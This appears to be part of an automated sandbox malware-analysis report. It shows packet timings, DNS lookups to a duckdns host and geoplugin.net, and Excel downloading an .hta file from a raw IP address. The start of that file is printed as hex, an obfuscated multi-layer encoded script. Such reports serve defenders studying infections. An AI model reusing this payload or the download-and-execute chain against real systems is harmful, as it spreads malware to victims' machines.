                                                                                                                                            Oct 4, 2024 11:56:31.980830908 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.980863094 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.980864048 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.980865002 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.980897903 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.980933905 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.980920076 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.980982065 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.980983973 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981019020 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981050014 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981070995 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981100082 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981132030 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981156111 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981169939 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981199026 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981220961 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981230021 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981264114 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981276035 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981296062 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981328011 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981337070 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981360912 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981394053 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981400967 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981443882 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981475115 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981484890 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981506109 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981538057 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981544971 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981571913 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981604099 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981609106 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981637955 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981669903 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981686115 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981700897 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981733084 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981744051 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981765985 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981798887 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981805086 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981832981 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981873035 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.981942892 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.981973886 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982006073 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982012987 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982038975 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982070923 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982078075 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982104063 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982136965 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982141972 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982171059 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982202053 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982209921 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982234001 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982264996 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982275009 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982451916 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982482910 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982495070 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982517004 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982547998 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982557058 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982580900 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982613087 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982623100 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982645035 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982676029 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982683897 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982717037 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982747078 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982760906 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982780933 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982820034 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.982830048 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982862949 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982892990 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.982903004 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983056068 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983087063 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983105898 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983119011 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983161926 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983169079 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983201981 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983232975 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983241081 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983264923 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983297110 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983309984 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983330011 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983361006 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983371019 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983417988 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983452082 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983462095 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983586073 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983601093 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983613968 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983625889 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983628035 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983647108 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983669996 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983684063 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983696938 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983701944 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983712912 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983726978 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983733892 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983741999 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983756065 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983766079 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983771086 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983786106 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983793974 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983800888 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983815908 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.983825922 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.983855963 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984183073 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984205961 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984220028 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984234095 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984246969 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984249115 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984263897 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984276056 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984278917 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984293938 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984302998 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984309912 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984323025 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984337091 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984338999 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984354019 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984369993 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:31.984370947 CEST8049181192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:31.984396935 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:32.187887907 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:32.196779013 CEST4918180192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:34.756513119 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:34.758244038 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:56:34.765845060 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:57:04.756778002 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:57:04.954149008 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:57:04.959187031 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:57:21.219882965 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:21.593213081 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:22.201670885 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:23.402832031 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:25.898849010 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:30.771184921 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:57:34.757982016 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:57:34.759476900 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:57:34.766200066 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:57:40.391129017 CEST4917880192.168.2.22178.237.33.50
                                                                                                                                            Oct 4, 2024 11:58:04.773893118 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:58:04.775458097 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:58:04.780406952 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:58:34.774950981 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:58:34.800354004 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:58:34.805378914 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:59:04.785120010 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            Oct 4, 2024 11:59:04.786550999 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                            Oct 4, 2024 11:59:04.791397095 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 4, 2024 11:55:52.974381924 CEST5456253192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:55:52.994224072 CEST53545628.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:55:55.305042982 CEST5291753192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:55:55.317222118 CEST53529178.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:09.829430103 CEST6275153192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:56:09.836952925 CEST53627518.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.315099001 CEST5789353192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:56:14.412411928 CEST53578938.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.641028881 CEST5482153192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:56:14.649826050 CEST53548218.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:15.779723883 CEST5471953192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:56:15.792516947 CEST53547198.8.8.8192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:28.146403074 CEST4988153192.168.2.228.8.8.8
                                                                                                                                            Oct 4, 2024 11:56:28.152947903 CEST53498818.8.8.8192.168.2.22
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Oct 4, 2024 11:55:52.974381924 CEST192.168.2.228.8.8.80x6b14Standard query (0)stylite.ioA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:55:55.305042982 CEST192.168.2.228.8.8.80xbed5Standard query (0)stylite.ioA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:09.829430103 CEST192.168.2.228.8.8.80x5e72Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:14.315099001 CEST192.168.2.228.8.8.80xa646Standard query (0)idabo.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:14.641028881 CEST192.168.2.228.8.8.80xddaStandard query (0)stylite.ioA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:15.779723883 CEST192.168.2.228.8.8.80xb564Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:28.146403074 CEST192.168.2.228.8.8.80xbbd6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Oct 4, 2024 11:55:52.994224072 CEST8.8.8.8192.168.2.220x6b14No error (0)stylite.io213.183.76.21A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:55:52.994224072 CEST8.8.8.8192.168.2.220x6b14No error (0)stylite.io213.183.76.22A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:55:55.317222118 CEST8.8.8.8192.168.2.220xbed5No error (0)stylite.io213.183.76.21A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:55:55.317222118 CEST8.8.8.8192.168.2.220xbed5No error (0)stylite.io213.183.76.22A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:09.836952925 CEST8.8.8.8192.168.2.220x5e72No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:09.836952925 CEST8.8.8.8192.168.2.220x5e72No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:09.836952925 CEST8.8.8.8192.168.2.220x5e72No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:09.836952925 CEST8.8.8.8192.168.2.220x5e72No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:14.412411928 CEST8.8.8.8192.168.2.220xa646No error (0)idabo.duckdns.org135.148.195.248A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:14.649826050 CEST8.8.8.8192.168.2.220xddaNo error (0)stylite.io213.183.76.22A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:14.649826050 CEST8.8.8.8192.168.2.220xddaNo error (0)stylite.io213.183.76.21A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:15.792516947 CEST8.8.8.8192.168.2.220xb564No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:28.152947903 CEST8.8.8.8192.168.2.220xbbd6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:28.152947903 CEST8.8.8.8192.168.2.220xbbd6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:28.152947903 CEST8.8.8.8192.168.2.220xbbd6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 11:56:28.152947903 CEST8.8.8.8192.168.2.220xbbd6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                            • stylite.io
                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                            • 192.3.220.20
                                                                                                                                            • geoplugin.net
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.2249166192.3.220.20803432C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 11:55:54.380403996 CEST357OUTGET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: 192.3.220.20
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Oct 4, 2024 11:55:54.869769096 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 04 Oct 2024 09:55:54 GMT
                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 06:11:18 GMT
                                                                                                                                            ETag: "1d4f7-623a08a0dc3cf"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 120055
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/hta
                                                                                                                                            Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                                                                                            Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520TYPe%25253D%252522TeXT/vBsCRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                            Oct 4, 2024 11:55:54.869792938 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                            Oct 4, 2024 11:55:54.869807005 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                            Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                            Oct 4, 2024 11:55:54.869843006 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                            Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                            Oct 4, 2024 11:55:54.869858027 CEST896INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                            Oct 4, 2024 11:55:54.869872093 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                            Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
